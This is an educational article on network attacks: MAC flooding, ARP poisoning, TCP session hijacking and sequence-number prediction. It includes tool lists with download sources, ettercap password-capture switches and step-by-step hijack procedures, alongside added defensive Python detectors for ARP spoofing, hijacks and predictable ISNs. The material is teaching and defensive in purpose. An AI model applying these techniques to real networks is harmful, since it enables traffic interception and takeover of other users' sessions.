MAC flooding is the act of attempting to overload the switch's content addressable memory (CAM) table. All switches build a lookup table that maps MAC addresses to switch port numbers. This enables the switch to know which port to forward each specific packet out of. The problem is that in older or cheaper switches the amount of memory is limited. If the CAM table fills up and the switch can hold no more entries, some might fall into a fail-open state. This means that all frames start flooding out of all ports of the switch, which allows the attacker to sniff traffic that might not otherwise be visible. The drawback of this form of attack is that the attacker is now injecting a large amount of traffic into the network, which can draw attention to the attacker. With this type of attack, the sniffer should be placed on a second system, because the one doing the flooding will be generating so many packets that it might be unable to perform a suitable capture. Tools for performing this type of attack include:

EtherFlood EtherFlood floods a switched network with Ethernet frames with random hardware addresses. The effect on some switches is that they start sending traffic out on all ports so that you can sniff all the traffic on the network. EtherFlood can be downloaded from http://ntsecurity.nu/toolbox/etherflood.

SMAC A MAC spoofing tool that allows an attacker to spoof their MAC address. They can change their MAC address to any other value or manufacturer they would like. SMAC is available from www.klcconsulting.net/smac.

Macof Macof floods the LAN with false MAC addresses in hopes of overloading the switch. It can be downloaded from http://monkey.org/~dugsong/dsniff

[ARP Poisoning]


ARP poisoning is the second method that can be used to overcome switches. A review of the ARP process will help in your understanding of how this is possible. Address Resolution Protocol is a helper protocol that in many ways is similar to the domain name service (DNS). DNS resolves known domain names to unknown IP addresses; ARP resolves known IP addresses to unknown MAC addresses. Both DNS and ARP are two-step protocols. ARP is how network devices associate a specific MAC address with an IP address so that devices on the local network can find each other. As an example, think of MAC addresses as physical street addresses, whereas IP addresses are logical names. You might know that my name is Michael Gregg and because I'm the author of this book, you would like to send me a note about it. The problem is that knowing my name is not enough. You need a physical address to know where the note to Michael Gregg should be delivered. ARP serves that purpose and ties the two together. ARP is a simple protocol that consists of two message types:

An ARP Request Computer A asks the network, "Who has this IP address?"

An ARP Reply Computer B tells computer A, "I have that IP. My MAC address is XYZ."

The developers of ARP lived in a much more trusting world than we do today, so they made the protocol simple. The problem is that this simple design makes ARP poisoning possible. When an ARP request is sent, the system simply trusts that when the ARP reply comes in, it really does come from the correct device. ARP provides no way to verify that the responding device is really who it says it is. It's so trusting that many operating systems accept ARP replies even when no ARP request was made. To reduce the amount of ARP traffic on a network, systems implement something called an ARP cache. The ARP cache stores the IP address, the MAC address, and a timer for each entry. The timer varies from vendor to vendor: OSes such as Microsoft's use 2 minutes and many Linux vendors use 15 minutes. You can view the ARP cache for yourself by issuing the arp -a command.

With a review of the ARP process out of the way, you should now be able to see how ARP spoofing works. The method involves sending phony ARP requests or replies to the switch and other devices to attempt to steer traffic to the sniffing system. Bogus ARP packets will be stored by the switch and by the other devices that receive the packets. The switch and these devices will place this information into the ARP cache and now map the attacker to the spoofed device. The MAC address being spoofed is usually the router so that the attacker can capture all outbound traffic.

First, the attacker would say that the router's IP address is mapped to his MAC address. Second, the victim now attempts to connect to an address outside the subnet. The victim has an ARP mapping showing that the router's IP is mapped to the hacker's MAC; therefore, the physical packets are forwarded through the switch to the hacker. Finally, the hacker forwards the traffic on to the router. After this setup is in place, the hacker is able to pull off many types of man-in-the-middle attacks. This includes passing on the packets to their true destination, scanning them for useful information, or recording the packets for a session replay later. IP forwarding is a critical step in this process. Without it, the attack will turn into a DoS. There are many tools for performing ARP spoofing attacks for both Windows and Linux. A few are introduced here:

Arpspoof Part of the Dsniff package of tools written by Dug Song. Arpspoof redirects packets from a target system on the LAN intended for another host on the LAN by forging ARP replies.

Ettercap One of the most feared ARP poisoning tools, because Ettercap can be used for ARP poisoning, for passive sniffing, as a protocol decoder, and as a packet grabber. It is menu driven and fairly simple to use. As an example, ettercap -Nzs will start Ettercap in command-line mode (-N), not perform an ARP storm for host detection (-z), and passively sniff for IP traffic (-s). This will output packets to the console in a format similar to Windump or Tcpdump. Ettercap exits when you type q. Ettercap can even be used to capture usernames and passwords by using the -C switch. Other common switches include: -N is non-interactive mode, -z starts in silent mode to avoid ARP storms, and -a is used for ARP sniffing on switched networks.

Cain A multipurpose tool that has the capability to perform a variety of tasks, including ARP poisoning, Windows computer enumeration, sniffing, and password cracking. The ARP poisoning function is configured through a GUI interface.

Sniffers, such as Ethereal, are capable of displaying multiple views of captured traffic. Three main views are available, which include

Summary

Detail

Hex


The uppermost window shows the summary display. It is a one-line-per-packet format. The highlighted line shows the source and destination MAC address, the protocol that was captured, ARP, and the source and destination IP address. The middle window shows the detail display. Its job is to reveal the contents of the highlighted packet. Notice that there is a plus sign in front of these fields; clicking on the plus sign reveals more detail. The third and bottom display is the hex display. The hex display represents the raw data. There are three sections to the hex display. The numbers to the left represent the offset in hex of the first byte of the line. The middle section shows the actual hex value of each portion of the headers and the data. The right side of the display shows the sniffer's translation of the hex data into its American Standard Code for Information Interchange (ASCII) format. It's a good place to look for usernames and passwords.

An important feature of a sniffer such as Ethereal is the capability it has to set up filters to view specific types of traffic. Filters can be defined in one of two ways:

Capture filters Used when you know in advance what you are looking for. They allow you to predefine the type of traffic captured. As an example, you could set a capture filter to capture only HTTP traffic.

Display filters Done after the fact. Display filters are used after the traffic is captured. Although you might have captured all types of traffic, you could apply a display filter to show only ARP packets.

Although Ethereal is useful for an attacker to sniff network traffic, it's also useful for the security professional. Sniffers allow you to monitor network statistics and discover MAC flooding or ARP spoofing. Filters are used to limit the amount of captured data viewed and to focus on a specific type of traffic.

[Defence]

Sniffing is a powerful tool in the hands of a hacker, and as you have seen, many sniffing tools are available. Defenses can be put in place. It is possible to build static ARP entries, but that would require you to configure a lot of devices connected to the network; it's not that feasible. A more workable solution would be port security. Port security can be accomplished by programming each switch and telling them which MAC addresses are allowed to send/receive and be connected to each port. Again, if the network is large, this can be a time-consuming process. The decision has to take into account the need for security versus the time and effort to implement the defense. Use encryption. IPSec, VPNs, SSL, and PKI can all make it much more difficult for the attacker to sniff valuable traffic. Linux tools such as Arpwatch are also useful. Arpwatch keeps track of ethernet/ip address pairings and can report unusual changes. Even DNS spoofing can be defeated by using DNS Security Extensions (DNSSEC). It digitally signs all DNS replies to ensure their validity. RFC 4035 is a good reference to learn more about this defense.
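An Arpwatch-style check of the kind just described, written here as an added example (it is not code from the original article or from Arpwatch): it keeps an IP-to-MAC table, reports an address that suddenly answers from a different MAC, a MAC claiming a second IP, and a burst of never-seen MACs, and runs over a constructed trace that uses documentation addresses.

```python
"""Arpwatch-style ARP monitor replayed over a constructed trace.

Added example, not code from the original article or from Arpwatch. It keeps
an IP-to-MAC table like the ARP cache discussed above and raises alerts for
the two switch attacks described earlier: an IP (here the router) suddenly
answered from a different MAC, and a burst of never-seen MACs (MAC flooding).
All addresses below are constructed from documentation ranges.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

ROUTER_IP = "192.0.2.1"                 # constructed gateway address
ROUTER_MAC = "00:00:5e:00:53:01"        # constructed, IANA documentation range
ATTACKER_MAC = "00:00:5e:00:53:20"      # constructed


@dataclass
class ArpReply:
    ts: float           # capture time in seconds
    sender_ip: str      # IP address the reply claims to speak for
    sender_mac: str     # hardware address carried in the reply


class ArpMonitor:
    """Tracks IP->MAC pairings and records (kind, message) alerts."""

    def __init__(self, flood_window: float = 1.0, flood_threshold: int = 20):
        self.window = flood_window
        self.threshold = flood_threshold
        self.table: Dict[str, str] = {}                        # ip -> last mac seen
        self.mac_ips: Dict[str, Set[str]] = defaultdict(set)   # mac -> ips it claimed
        self.new_macs: List[Tuple[float, str]] = []            # first sightings in window
        self.flood_reported = False
        self.alerts: List[Tuple[str, str]] = []

    def observe(self, r: ArpReply) -> None:
        prev = self.table.get(r.sender_ip)
        if prev is not None and prev != r.sender_mac:
            # Same IP, new hardware address: what Arpwatch reports as a changed
            # ethernet address, and what a poisoned gateway entry looks like.
            self.alerts.append(("changed", f"{r.sender_ip} moved from {prev} to {r.sender_mac}"))
        self.table[r.sender_ip] = r.sender_mac

        first_sighting = r.sender_mac not in self.mac_ips
        self.mac_ips[r.sender_mac].add(r.sender_ip)
        if len(self.mac_ips[r.sender_mac]) == 2:
            # One card answering for two IPs is normal for a multi-homed host, but
            # it is also exactly what a station impersonating the router looks like.
            self.alerts.append(("multi-ip", f"{r.sender_mac} now claims {sorted(self.mac_ips[r.sender_mac])}"))

        if first_sighting:
            self.new_macs.append((r.ts, r.sender_mac))
            self.new_macs = [(t, m) for t, m in self.new_macs if r.ts - t <= self.window]
            if len(self.new_macs) >= self.threshold and not self.flood_reported:
                # Many brand-new source addresses in a short window: CAM-table flooding.
                self.flood_reported = True
                self.alerts.append(("flood", f"{len(self.new_macs)} new hardware addresses within {self.window}s"))


def build_trace() -> List[ArpReply]:
    """Constructed capture: normal replies, a poisoned router entry, then a flood."""
    trace = [
        ArpReply(0.0, ROUTER_IP, ROUTER_MAC),
        ArpReply(0.5, "192.0.2.10", "00:00:5e:00:53:10"),    # a workstation
        ArpReply(1.0, "192.0.2.20", ATTACKER_MAC),           # attacker's own address
        ArpReply(5.0, ROUTER_IP, ATTACKER_MAC),              # router IP now answered by attacker
    ]
    for i in range(40):                                      # 40 random-looking MACs in 0.4 s
        trace.append(ArpReply(10.0 + i * 0.01, "192.0.2.%d" % (100 + i), "02:00:00:00:00:%02x" % i))
    return trace


def run_monitor(trace: List[ArpReply]) -> ArpMonitor:
    mon = ArpMonitor()
    for reply in trace:
        mon.observe(reply)
    return mon
```

Feeding real replies into observe() from a capture gives the same three alert kinds; the window and threshold are starting points and should be tuned to the segment.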

[Session Hijacking]


Session hijacking is when sensitive information is stolen or viewed without knowledge or permission. This kind of hijacking is not very common, but when performed it is extremely dangerous. In session hijacking the attacker relies on a user to connect and authenticate, and then takes over the session. In a spoofing attack, the attacker pretends to be another user or machine to gain access. Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control. Session hijacking can be active or passive, depending on the degree of involvement of the attacker. Many tools exist to aid the attacker in perpetrating a session hijack. As said previously, session hijacking can be very dangerous and there is a need for strict protection. In this article I will focus on ACK storms, TCP/IP methods, sequence prediction attacks, hijack tools, types of hijacks and the difference between spoofing and hijacking.

The whole point of session hijacking is to get authentication to an active system. Hacking into systems is not always a trivial act. Session hijacking provides the attacker with an authenticated session in which he can then execute commands. The problem is that the attacker must identify and find a session. This process is much easier when the attacker and the victim are on the same segment of the network. If both users are on a hub, this process requires nothing more than passive sniffing. If a switch is being used, active sniffing is required. Either way, if the attacker can sniff the sequence and acknowledgement numbers, a big hurdle has been overcome, because otherwise it would be potentially difficult to calculate these numbers accurately. Sequence numbers are discussed in the next section. If the attacker and the victim are not on the same segment of the network, blind sequence number prediction must be performed. This is a more sophisticated and difficult attack because the sequence and acknowledgement numbers are unknown. To circumvent this, several packets are sent to the server to sample sequence numbers. If this activity is blocked at the firewall, the probe will fail. Also, in the past, basic techniques were used for generating sequence numbers, but today that is no longer the case, because most OSes implement random sequence number generation, making it difficult to predict them accurately.

Force all incoming connections from the outside world to be fully encrypted, and all connections to critical machines to be fully encrypted. Force all traffic on the network to be encrypted, using encrypted protocols like those found in the OpenSSH suite. The OpenSSH suite includes the ssh program, which replaces rlogin and telnet; scp, which replaces rcp; and sftp, which replaces ftp. Also included is sshd, the server side of the package, and other basic utilities such as ssh-add, ssh-agent, ssh-keygen and sftp-server. All these steps will prevent and protect you and your information from any kind of hijacking.

[TCP/IP Hijacking]

TCP hijacking relies on the violation of trust relationships between two interacting hosts. Let's take a look at the TCP stack and the IPv4 protocol to understand why this is possible.

(TCP stack)

Every time you access the Internet with a browser such as Internet Explorer, the browser works at the application layer and accepts the initial datagram to be sent across the Internet. The transport protocol comes into action in the next layer, called the transport layer, and the appropriate protocol header is added to the datagram; here it is a TCP header, as TCP is the protocol being used. This ensures the reliability of data transported over inherently unreliable communication platforms, and also controls many aspects of the management and initiation of communication between the two hosts. In the network layer, routers offer the functionality for the datagram to hop from the source to the destination, one hop at a time. This layer also sees the IP header being added to the datagram. The final layer, which communicates with the physical system, is the data link layer. This layer is responsible for the delivery of signals from the source to the destination over a physical communication platform, which here is Ethernet. This layer also sees the frame header being added to the datagram.

(IPv4)

The headers are peeled back on reaching the destination to reveal the original datagram. The original IPv4 standard needed to address three basic security issues - authentication, integrity and privacy. Authentication was an issue because an attacker could easily spoof an IP address and exploit a session. Spoofing was not restricted to IP address alone, but also extended to MAC addresses in ARP spoofing. An attacker sniffing on a network could sniff packets and carry out simple attacks such as change, delete, reroute, add, forge or divert data. Perhaps the most popular among these attacks is the Man-In-the-Middle attack. An attacker can grab unencrypted traffic from a victim's network-based TCP application, further tampering with the authenticity and integrity of the data before forwarding it on to the unsuspecting target.


[Spoofing & Hijacking]


(SPOOFING)

Spoofing can be summed up in a single sentence: it is a sophisticated technique for authenticating one machine to another by forging packets from a trusted source address. A spoofing attack is different from a hijack. In spoofing, the attacker is not taking another user offline to perform the attack; he pretends to be another user or machine to gain access. For example, say a host only allows certain IPs to connect to that server and all others are blocked; an attacker can change, or more technically "spoof", his MAC address with tools such as SMAC or BMACC, get a fake IP and connect to the server. Blind IP spoofing involves predicting the sequence numbers that the victimized host will send in order to create a connection which appears to originate from the host. Before exploring blind spoofing further, let us take a look at sequence number prediction.

TCP sequence numbers are used to provide flow control and data integrity for TCP sessions. Every byte in a TCP session has a unique sequence number. Moreover, every TCP segment provides the sequence number of its initial byte as part of the segment header. The initial sequence number (ISN) does not start at zero for each session. Instead, the participants specify initial sequence numbers as part of the handshake process, a different ISN for each direction, and begin numbering the bytes sequentially from there.

Blind IP spoofing relies on the attacker's ability to predict sequence numbers, as he is unable to sniff the communication between the two hosts by virtue of not being on the same network segment. He cannot spoof a trusted host on a different network and see the reply packets, because the packets are not routed back to him. He cannot resort to ARP cache poisoning either, because routers do not route ARP broadcasts across the Internet. As he is not able to see the replies, he is forced to anticipate the responses from the victim and prevent the host from sending a RST to the victim. The attacker then injects himself into the communication by predicting what sequence number the remote host is expecting from the victim. This is used extensively to exploit the trust relationships between users and remote machines; these services include NFS, NetBIOS, FTP, and so on.

IP spoofing is relatively easy to accomplish. The only prerequisite on the part of the attacker is to have root access on a machine in order to create raw packets. In order to establish a spoofed connection the attacker must know what sequence numbers are being used. Therefore, IP spoofing forces the attacker to predict the next sequence number.

The attacker can use "blind" hijacking to send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net. By SYN flooding the trusted host, the attacker establishes a short connection which is then used to gain access through common methods.

IP spoofing can only be implemented against certain machines running certain services. Many flavors of Unix are viable targets. (This shouldn't give you the impression that non-Unix systems are invulnerable to spoofing attacks. Most network services use IP-based authentication, and although RPC, the X Window System, and the r services have problems inherent to Unix-based operating systems, other operating systems are not immune.)

The following are some of the configurations and services that are known to be vulnerable:

Any device running Sun RPC

Any network service that uses IP address authentication

The X Window System from MIT

The r services

These are the essential steps that must be taken in a spoofing attack:


1. The cracker must identify his targets.

2. He must anesthetize the host he intends to impersonate.

3. He must forge the address of the host he's impersonating.

4. He must connect to the target, masquerading as the anesthetized host.

5. He must accurately guess the correct sequence number requested by the target.

(HIJACKING)

Hijacking is when an attacker takes over an existing session, which means he relies on the legitimate user to make a connection and authenticate, and then takes over the session. So basically the attacker is connected to the user and is waiting for him to connect and do his job. If the user doesn't connect, the attack fails. With IP spoofing there is no need to guess the sequence number, since there is no session currently open with that IP address. The traffic would get back to the attacker only by using source routing. This is where the attacker tells the network how to route the output and input from a session, and he simply sniffs it from the network as it passes by him. Source routing is an IP option used today mainly by network managers to check connectivity. Normally, when an IP packet leaves a system, its path is controlled by the routers and their current configuration. Source routing provides a means to override the control of the routers.

When an attacker uses captured, reverse-engineered or brute-forced authentication tokens to take over control of a legitimate user's session while that user is in session, the session is said to be hijacked. Due to this attack, the legitimate user may lose access or be deprived of the normal functionality of the session to the attacker, who now acts with the user's privileges. Most authentication occurs at the beginning of a TCP session; this makes it possible for the attacker to gain access to a target machine. A popular method attackers adopt is to use source-routed IP packets. This allows an attacker to become a part of the target-host conversation by deceiving the IP packets into passing through his system. The attacker can also carry out the classic man-in-the-middle attack using a sniffing program to monitor the conversation. In TCP session hijacking, a familiar aspect of the attacks is the carrying out of a denial-of-service (DoS) attack against the target and host to prevent it from responding, by either forcing the machine to crash or attacking the network connection to cause heavy packet loss.

Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control. Knowledge of the ISN would be the least of John's challenges. For instance, he would need a way to knock Jane off the air at will. He also would need a way to know the exact status of Jane's session at the moment he mounted his attack. Both of these require that John have far more knowledge about and control over the session than normally would be possible. However, IP address spoofing attacks can only be successful if IP addresses are used for authentication. An attacker cannot perform IP address spoofing or session hijacking if per-packet integrity checking is performed. Similarly, neither IP address spoofing nor session hijacking is possible if the session uses encryption such as SSL or PPTP, as the attacker will not be able to participate in the key exchange. Therefore the essential requirements to hijack non-encrypted TCP communications can be listed as: presence of non-encrypted session-oriented traffic, ability to recognize TCP sequence numbers and predict the next sequence number (NSN), and capability to spoof a host's MAC or IP address to receive communications which are not destined for the attacker's host. If the attacker is on the local segment, he can sniff and predict the ISN+1 number and have the traffic routed back to him by poisoning the ARP cache.

[How Session Hijacking is performed]

The attack proceeds in four steps:

1. Track the session.

2. Desynchronize the connection.

3. Reset the connection.

4. Inject your packets.

Let's look closer at each step.

[Tracking the connection]

The attacker waits to find a suitable target and host. He uses a network sniffer to track the victim and host, or identifies a suitable user by scanning with nmap to find a target with trivial TCP sequence prediction. This is done to capture the correct sequence and acknowledgement numbers, since TCP checks packets by their sequence and acknowledgement numbers. These will later be used by the attacker in making his own packets.

[Desynchronizing the connection]

The connection between the target and host is desynchronized when it is in the established state, or in a stable state with no data transmission, and the server's sequence number is not equal to the client's acknowledgement number, or the client's sequence number is not equal to the server's acknowledgement number. To desynchronize the connection between the target and host, the sequence number or the acknowledgement number (SEQ/ACK) of the server must be changed. This can be done by sending null data to the server so that the server's SEQ/ACK numbers advance, while the target machine does not register such a change.
To desynchronize, the attacker monitors the session without interference until an opportune moment, when he sends a large amount of "null data" to the server. This data serves only to change the ACK number on the server and does not affect anything else. The attacker then does the same thing to the target. Now both the server and the target are desynchronized.

[Resetting the connection]

Another trick is to send a reset flag to the server and tear down the connection on the server side. This is usually done in the early setup stage. The goal of the attacker is to break the connection on the server side and create a new one with a different sequence number.
The attacker listens for a SYN/ACK packet from the server to the host. On detecting the packet, he sends an RST to the server and a SYN packet with exactly the same parameters, such as port number, but a different sequence number. The server, on receiving the RST packet, closes the connection with the target, but initiates another one based on the SYN packet, with a different sequence number on the same port. Having opened a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this and sends back an ACK packet to the server. Now the server is in the established state. The target is oblivious to the conversation and has already switched to the established state when it received the first SYN/ACK packet from the server. Now both server and target are in a desynchronized but established state.
Since TCP runs over IP, the loss of a single packet puts an end to the unwanted conversation between the server and target on the network. The desynchronizing stage is added to the hijack sequence so that the target host is kept in the dark about the attack. Without desynchronizing, the attacker will still be able to inject data to the server and even keep his identity hidden by spoofing an IP address. However, he will have to put up with the server's responses being relayed to the target host as well.

[Injecting your packets]

Now that the attacker has interrupted the connection between the server and target, he can choose to either inject data into the network or actively participate as the "man in the middle", and pass data from the target to the server, and vice versa.
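The four steps above leave traces a sensor on the segment can look for. The following is an added example (not code from the original page) of a heuristic detector for two of them: an RST from one side followed within seconds by a SYN on the same ports but a different ISN (the reset step), and a later data segment from the real host whose sequence number no longer matches what that host's own earlier segments predict (the sign that the server was re-synchronised to someone else's numbers). Packet records are constructed inline; the field layout and the 2-second reopen window are assumptions.

```python
from dataclasses import dataclass


@dataclass
class Pkt:
    """One TCP segment as a sensor would see it (constructed records below)."""
    ts: float      # seconds
    src: str
    sport: int
    dst: str
    dport: int
    flags: str     # any of S (SYN), A (ACK), P (PSH), R (RST), F (FIN)
    seq: int
    ack: int
    plen: int      # payload bytes


def flow_key(p):
    """Direction-independent key for the 4-tuple that identifies a connection."""
    a, b = (p.src, p.sport), (p.dst, p.dport)
    return (a, b) if a <= b else (b, a)


def detect_hijack(packets, reopen_window=2.0):
    """Return a list of (ts, kind, detail) alerts.

    "reset-and-reopen": an RST from one side followed, within reopen_window
    seconds, by a SYN from the same side on the same 4-tuple with a new ISN.
    "seq-jump": a data segment whose sequence number is ahead of what the
    sender's previous segments lead us to expect (the legitimate host, still
    on the old numbers, after the server has been re-synchronised).
    """
    alerts = []
    isn = {}        # (flow, sender) -> ISN announced in the last SYN
    last_rst = {}   # (flow, sender) -> time of the last RST from that sender
    expected = {}   # (flow, sender) -> next sequence number we expect from it
    for p in packets:
        d = (flow_key(p), (p.src, p.sport))
        who = f"{p.src}:{p.sport}->{p.dst}:{p.dport}"
        if "R" in p.flags:
            last_rst[d] = p.ts
            expected.pop(d, None)       # the sender has torn its side down
            continue
        if "S" in p.flags:              # SYN or SYN/ACK: a fresh ISN
            prev = isn.get(d)
            recent_rst = d in last_rst and p.ts - last_rst[d] <= reopen_window
            if prev is not None and prev != p.seq and recent_rst:
                alerts.append((p.ts, "reset-and-reopen",
                               f"{who} ISN {prev} replaced by {p.seq}"))
            isn[d] = p.seq
            expected[d] = p.seq + 1     # a SYN consumes one sequence number
            continue
        exp = expected.get(d)
        if exp is None or p.plen == 0:
            continue                    # pure ACKs carry no new sequence space
        if p.seq > exp:
            alerts.append((p.ts, "seq-jump",
                           f"{who} expected seq {exp}, saw {p.seq}"))
        if p.seq >= exp:                # retransmissions (seq < exp) are ignored
            expected[d] = p.seq + p.plen
    return alerts


# Constructed sample: a telnet session, then a spoofed RST and a spoofed SYN
# (same ports, ISN 777) re-open the server side behind the real client's back.
C, S = ("10.0.0.5", 40000), ("10.0.0.9", 23)
LEGIT = [
    Pkt(0.0, *C, *S, "S", 1000, 0, 0),
    Pkt(0.1, *S, *C, "SA", 5000, 1001, 0),
    Pkt(0.2, *C, *S, "A", 1001, 5001, 0),
    Pkt(0.3, *C, *S, "PA", 1001, 5001, 10),
    Pkt(0.4, *S, *C, "PA", 5001, 1011, 20),
]
HIJACK = LEGIT + [
    Pkt(3.0, *C, *S, "R", 1011, 0, 0),       # spoofed RST to the server
    Pkt(3.1, *C, *S, "S", 777, 0, 0),        # spoofed SYN, new ISN, same ports
    Pkt(3.2, *S, *C, "SA", 9000, 778, 0),
    Pkt(3.3, *C, *S, "A", 778, 9001, 0),
    Pkt(3.4, *C, *S, "PA", 1011, 5021, 4),   # the real client, still on old numbers
]
```

Run `detect_hijack(HIJACK)` to see both alerts; `detect_hijack(LEGIT)` stays empty.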

[Active and Passive attacks]

In an active attack, an attacker finds an active session and takes it over. With a passive attack, an attacker hijacks a session but sits back, watches and records all of the traffic that is being sent back and forth. The main difference between an active and a passive hijack is that an active hijack takes over an existing session, while a passive attack monitors an ongoing session.

Generally a [passive attack] uses sniffers on the network, allowing the attacker to obtain information such as user IDs and passwords so that he can use them later to log on as that user and claim his privileges. Password sniffing is only the simplest attack that can be performed once raw access to a network is obtained. Counters against this attack range from identification schemes such as one-time passwords to ticket-based identification. While these may keep sniffing from yielding any productive results, they do not protect the network from an active attack either, as long as the data is neither digitally signed nor encrypted.

In an [active attack], the attacker takes over an existing session by either tearing down the connection on one side of the conversation or by actively participating by being the man-in-the-middle.

This requires the ability to predict the sequence number before the target can respond to the server. Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number.

[Sequence Numbers]

Sequence numbers are very important for providing reliable communication, but they are also important to hijacking a session.
The numbers are a 32-bit counter, which means the value can be any of over 4 billion possible values. They are used to tell the receiving machine what order the packets should go in when they are received. Therefore an attacker must successfully guess the sequence number to hijack a session.

TCP provides a full duplex reliable stream connection between two end points. A connection is uniquely defined by the IP address of sender, TCP port number of the sender, IP address of the receiver and TCP port number of the receiver.

Every byte that is sent by a host is marked with a sequence number and is acknowledged by the receiver using this sequence number. The sequence number for the first byte sent is computed during the connection opening. It changes for any new connection based on rules designed to avoid reuse of the same sequence number for two different sessions of a TCP connection.

Recall from our discussion of the three-way handshake how the sequence number is incremented. What happens if the sequence number is predictable? When the TCP sequence is predictable, an attacker can send packets that are forged to appear to come from a trusted computer.

The next step taken was to tighten the OS implementation of TCP and introduce randomness in the ISN. This was done by the use of pseudo-random number generators (PRNGs). PRNGs introduced some randomness when producing ISNs used in TCP connections. However, adding a series of numbers together provided insufficient variance in the range of likely ISN values; thereby allowing an attacker to disrupt or hijack existing TCP connections or spoof future connections against vulnerable TCP/IP stack implementations.

This implied that systems relying on random increments to make ISNs harder to guess were still vulnerable to statistical attack. Basically, with the passage of time, even computers choosing random numbers will repeat themselves, because the randomness is based on an internal algorithm used by a particular operating system. Once a sequence number has been agreed upon, all following data will be numbered from ISN+1. This makes injecting data into the communication stream possible.

If a sequence number within the receive window is known, an attacker can inject data into the session stream or choose to terminate the connection. If the attacker knows the initial sequence number, he can send a simple packet to inject data or kill the session, provided he is aware of the number of bytes transmitted in the session thus far.

As this is a difficult proposition, the attacker can guess a suitable range of sequence numbers and send out a number of packets into the network with different sequence numbers - but falling within the range. Since the range is known, it is likely that at least one packet will be accepted by the server. This way, the attacker doesn't need to send a packet for every sequence number, but resort to sending an appropriate number of packets with sequence numbers a window-size apart.


But how does he know how many packets are to be sent?

This is obtained by dividing the range of sequence numbers to be covered by the fraction of the window size that is used as an increment. Why is this possible despite the introduction of PRNGs? The problem lay in the use of increments themselves, random or otherwise, to advance an ISN counter, making statistical guessing practical. The result of this is that remote attackers can perform session hijacking or disruption by injecting a flood of packets with a range of ISN values, one of which may match the expected ISN. The more random the ISNs are, the more difficult it is to carry out these attacks.
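The three ISN generation schemes discussed above (constant increment, random increment, fully random) differ in how wide a range of sequence numbers an observer has to cover, and the text's formula turns that range into a packet count. The following added example (not from the original page) assesses a sample of ISNs from one's own stack the way a sequence-predictability check would: it classifies the scheme from the successive deltas and applies the range/window formula. The ISN series are constructed, and the threshold separating a "narrow band" of increments from "random" is an assumption.

```python
import math

MOD = 1 << 32   # sequence numbers are a 32-bit counter and wrap


def isn_deltas(isns):
    """Differences between successive ISNs, modulo 2^32."""
    return [(b - a) % MOD for a, b in zip(isns, isns[1:])]


def classify_isn(isns, band=MOD // 1024):
    """Return (scheme, range_to_cover).

    scheme is "constant-increment" (every delta identical: the old, fully
    predictable way), "random-increment" (deltas vary but stay within a band
    narrower than `band`, so the next ISN lies in a range of that width) or
    "random" (the whole 32-bit space must be covered). `band` is an assumed
    threshold. range_to_cover is how many sequence numbers an observer would
    have to cover to be sure of hitting the next ISN, given only this sample.
    """
    d = isn_deltas(isns)
    if len(d) < 2:
        raise ValueError("need at least three ISN samples")
    if len(set(d)) == 1:
        return "constant-increment", 1
    spread = max(d) - min(d) + 1
    if spread < band:
        return "random-increment", spread
    return "random", MOD


def packets_to_cover(range_to_cover, window):
    """The text's formula: packets sent a window-size apart to cover a range."""
    return math.ceil(range_to_cover / window)


def _cumulative(start, increments):
    """Build an ISN series from a start value and per-connection increments."""
    out = [start]
    for inc in increments:
        out.append((out[-1] + inc) % MOD)
    return out


# Constructed samples (not real observations):
CONST = _cumulative(1000, [64000] * 7)          # fixed +64000 per connection
RANDINC = _cumulative(1000, [64000, 1500000, 300000, 2000000, 950000, 5000, 1200000])
RANDOM = [0x1A2B3C4D, 0xF0E1D2C3, 0x12345678, 0x9ABCDEF0, 0x0BADF00D, 0xDEADBEEF]

if __name__ == "__main__":
    for name, series in (("constant", CONST), ("random-inc", RANDINC), ("random", RANDOM)):
        scheme, rng = classify_isn(series)
        print(f"{name:11s} {scheme:19s} range={rng:>10d} "
              f"packets(window 16384)={packets_to_cover(rng, 16384)}")
```

With a 16384-byte window the three samples need 1, 122 and 262144 packets respectively, which is the text's point that more random ISNs make the attack harder.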

[Spoofing/Hijacking Tools]


Several programs are available that perform session hijacking. The following are a few that belong to this category:

Ettercap - Ettercap runs on Linux, BSD, Solaris 2.x, most flavors of Windows, and Mac OS X. Ettercap will ARP spoof the targeted host so that any ARP requests for the target's IP will be answered with the sniffer's MAC address, allowing traffic to pass through the sniffer before ettercap forwards it on. This allows ettercap to be used as an excellent man-in-the-middle tool. Ettercap uses four modes:

- IP: packets are filtered based on source and destination.

- MAC: packet filtering based on MAC address.

- ARP: ARP poisoning is used to sniff/hijack switched LAN connections (in full-duplex mode).

- Public ARP: ARP poisoning is used to allow sniffing of one host to any other host.

Hunt - This is one of the best known session hijacking tools. It can watch, hijack, or reset TCP connections. Hunt is meant to be used on Ethernet and has active mechanisms to sniff switched connections. Advanced features include selective ARP relaying and connection synchronization after attacks. Requirements: C compiler, Linux.

TTY Watcher - This Solaris program can monitor and control users' sessions.

IP Watcher - IP Watcher is a commercial session hijacking tool that allows you to monitor connections and has active countermeasures for taking over a session.

T-Sight - This commercial hijack tool has the capability to hijack any TCP sessions on the network, monitor all your network connections in real-time, and observe the composition of any suspicious activity that takes place.

1644 - TTCP spoofing Tool. {Source} - Requirements: C compiler, IP header files, FreeBSD.

Juggernaut - Linux Tool, networking and packet spoofing tool. {Source} - Requirements: C compiler, IP Header Files, Unix.

synk4.c - Syn Flooder tool that allows IP Spoofing and packet spoofing. {Source} - Requirements: C compiler, IP header files, Linux


Trojans  

Trojan (bad) Beware!!!!
Trojan horse: this term has many meanings.
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.


Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).




There are two common types of Trojan horses.

One, is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.

The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program's objectives.



